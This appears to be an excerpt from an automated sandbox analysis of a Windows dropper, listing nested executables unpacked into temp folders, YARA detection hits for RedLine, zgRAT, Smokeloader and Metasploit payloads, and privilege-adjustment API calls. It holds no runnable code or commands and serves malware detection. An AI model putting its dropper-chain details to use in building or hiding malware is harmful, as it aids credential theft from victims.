Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Code function: 1_2_004C5C9E	1_2_004C5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Code function: 2_2_00ED3BA2	2_2_00ED3BA2
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Code function: 2_2_00ED5C9E	2_2_00ED5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008C8210	3_2_008C8210
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008F0224	3_2_008F0224
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008F06A8	3_2_008F06A8
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_0091C64F	3_2_0091C64F
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008C8750	3_2_008C8750
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008F0B19	3_2_008F0B19
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008FCB49	3_2_008FCB49
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008C4C13	3_2_008C4C13
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008FCB49	3_2_008FCB49
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008C4F70	3_2_008C4F70
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008F0F57	3_2_008F0F57
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008C4F70	3_2_008C4F70
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008B5380	3_2_008B5380
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008F13A8	3_2_008F13A8
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008F17E6	3_2_008F17E6
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008F1D0F	3_2_008F1D0F
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_009120FF	3_2_009120FF
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008F224B	3_2_008F224B
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_0085EC50	3_2_0085EC50
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_00912F97	3_2_00912F97
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008EF153	3_2_008EF153
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008B316A	3_2_008B316A
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008C75B0	3_2_008C75B0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008EF56D	3_2_008EF56D
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008EF999	3_2_008EF999
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008C3BE3	3_2_008C3BE3
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_008EFDB3	3_2_008EFDB3
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_00913D29	3_2_00913D29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00D70848	5_2_00D70848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00D70F71	5_2_00D70F71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00D71B68	5_2_00D71B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00D70838	5_2_00D70838
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_00D71B59	5_2_00D71B59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0C8C1F18	5_2_0C8C1F18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0C8C3940	5_2_0C8C3940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0C8CFB20	5_2_0C8CFB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0C8C4500	5_2_0C8C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0C8C70A8	5_2_0C8C70A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0C8CC1B8	5_2_0C8CC1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0C8C0118	5_2_0C8C0118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0C8C6360	5_2_0C8C6360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0C8C1ED8	5_2_0C8C1ED8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0C8C393B	5_2_0C8C393B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0C8C0108	5_2_0C8C0108
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E8770C	6_2_00E8770C
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E82D2E	6_2_00E82D2E
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E821CB	6_2_00E821CB
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E8641F	6_2_00E8641F
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E84093	6_2_00E84093
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E83738	6_2_00E83738
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E81D61	6_2_00E81D61
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E83738	6_2_00E83738
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E821EE	6_2_00E821EE
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E8295A	6_2_00E8295A
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E863E8	6_2_00E863E8
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E8362A	6_2_00E8362A
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E81492	6_2_00E81492
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E83D91	6_2_00E83D91
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E8295A	6_2_00E8295A
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E85DB2	6_2_00E85DB2
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E86433	6_2_00E86433
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E82B5D	6_2_00E82B5D
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E83346	6_2_00E83346
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E82757	6_2_00E82757
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E85367	6_2_00E85367
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E83DBE	6_2_00E83DBE
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E82DEC	6_2_00E82DEC
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E8143D	6_2_00E8143D
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00E87617	6_2_00E87617
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_00F43D29	6_2_00F43D29
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0104C110	6_2_0104C110
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010681C0	6_2_010681C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01054320	6_2_01054320
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010F4390	6_2_010F4390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010483A0	6_2_010483A0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010882A0	6_2_010882A0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01108568	6_2_01108568
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010645F0	6_2_010645F0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010B05F0	6_2_010B05F0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0106C460	6_2_0106C460
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010EC7A0	6_2_010EC7A0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010D87C0	6_2_010D87C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010586C0	6_2_010586C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01040920	6_2_01040920
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_011009C0	6_2_011009C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0104C110	6_2_0104C110
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010ECA50	6_2_010ECA50
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01100AF0	6_2_01100AF0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010B8D70	6_2_010B8D70
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01104DE0	6_2_01104DE0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010E4F90	6_2_010E4F90
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01054FC0	6_2_01054FC0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010611B0	6_2_010611B0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010891C0	6_2_010891C0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01101300	6_2_01101300
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0106D240	6_2_0106D240
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0111D509	6_2_0111D509
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01069490	6_2_01069490
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0103D4B0	6_2_0103D4B0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010F1750	6_2_010F1750
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010B9620	6_2_010B9620
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010AD840	6_2_010AD840
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01065860	6_2_01065860
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010F18A0	6_2_010F18A0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01051AF0	6_2_01051AF0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0105DD90	6_2_0105DD90
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01071D90	6_2_01071D90
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01085DB0	6_2_01085DB0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010B9DE0	6_2_010B9DE0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0110DC6E	6_2_0110DC6E
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01055C80	6_2_01055C80
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01049F20	6_2_01049F20
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0110DFB0	6_2_0110DFB0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01079E90	6_2_01079E90
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01069EA0	6_2_01069EA0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01075EA0	6_2_01075EA0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01102070	6_2_01102070
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010AE370	6_2_010AE370
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010C6200	6_2_010C6200
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010F2280	6_2_010F2280
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01049F20	6_2_01049F20
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0110A5A0	6_2_0110A5A0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010DA5D0	6_2_010DA5D0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0105E600	6_2_0105E600
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01084590	6_2_01084590
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010EE4B0	6_2_010EE4B0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_0110872F	6_2_0110872F
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010F4840	6_2_010F4840
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_01045850	6_2_01045850
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010F5C20	6_2_010F5C20
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: 6_2_010ECFF0	6_2_010ECFF0

Source: C:\Windows\explorer.exe

Section loaded: mfsrcsnk.dll

Source: C4AD.exe.11.dr	Static PE information: Number of sections : 12 > 10
Source: 853C.exe.11.dr	Static PE information: Number of sections : 12 > 10

Source: jtfCFDmLdX.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 43.2.D9EC.exe.27d948bd660.12.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 24.2.9AED.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.3.jtfCFDmLdX.exe.50b2220.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 43.2.D9EC.exe.27d9483d628.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 43.2.D9EC.exe.27d948bd660.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 12.0.6rR8iy1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 43.2.D9EC.exe.27d949bd698.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 43.2.D9EC.exe.27d9cc00000.16.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 24.2.9AED.exe.570000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 43.2.D9EC.exe.27d9cc00000.16.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 12.2.6rR8iy1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 43.2.D9EC.exe.27d949bd698.11.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001F.00000002.2373883044.000000C00076C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001F.00000003.2175797793.000000C0003A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001F.00000003.2174358473.000000C000418000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001F.00000002.2379752347.000000C000E54000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000A.00000002.1747098618.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000002B.00000002.2426218610.0000027D9CC00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001F.00000003.2174358473.000000C00042E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001F.00000003.2176077737.000000C0002C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001F.00000003.2171483498.000000C0004F8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001F.00000003.2175797793.000000C0003B8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001F.00000003.2173330685.000000C0004BA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000A.00000002.1747475725.00000000005E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001F.00000003.2144147018.000000C000772000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000001F.00000003.2171483498.000000C00076C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\AppData\Local\Temp\39D.exe, type: DROPPED	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Code function: 0_2_00FC1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	0_2_00FC1F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Code function: 1_2_004C1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	1_2_004C1F90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Code function: 2_2_00ED1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	2_2_00ED1F90

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: String function: 0090070F appears 35 times
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: String function: 0085267B appears 49 times
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: String function: 00E8267B appears 60 times
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: String function: 00F3070F appears 33 times
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: String function: 00E837E2 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: String function: 00E861B3 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	Code function: String function: 00E86262 appears 54 times

Source: jtfCFDmLdX.exe	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 1495268 bytes, 2 files, at 0x2c +A "TE0FN83.exe" +A "6rR8iy1.exe", ID 1773, number 1, 50 datablocks, 0x1503 compression
Source: TE0FN83.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 1271098 bytes, 2 files, at 0x2c +A "Tg9kb35.exe" +A "5zQ4dC4.exe", ID 1816, number 1, 41 datablocks, 0x1503 compression
Source: Tg9kb35.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 1145257 bytes, 2 files, at 0x2c +A "2zx1310.exe" +A "4ZZ099qJ.exe", ID 1806, number 1, 167 datablocks, 0x1503 compression

Source: D9EC.exe.11.dr	Static PE information: No import functions for PE file found
Source: 5zQ4dC4.exe.1.dr	Static PE information: No import functions for PE file found

Source: jtfCFDmLdX.exe, 00000000.00000003.1650495660.000000000351F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameoffDef.exe. vs jtfCFDmLdX.exe

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe

Process token adjusted: Security

Jump to behavior

Source: 9AED.exe.11.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5zQ4dC4.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
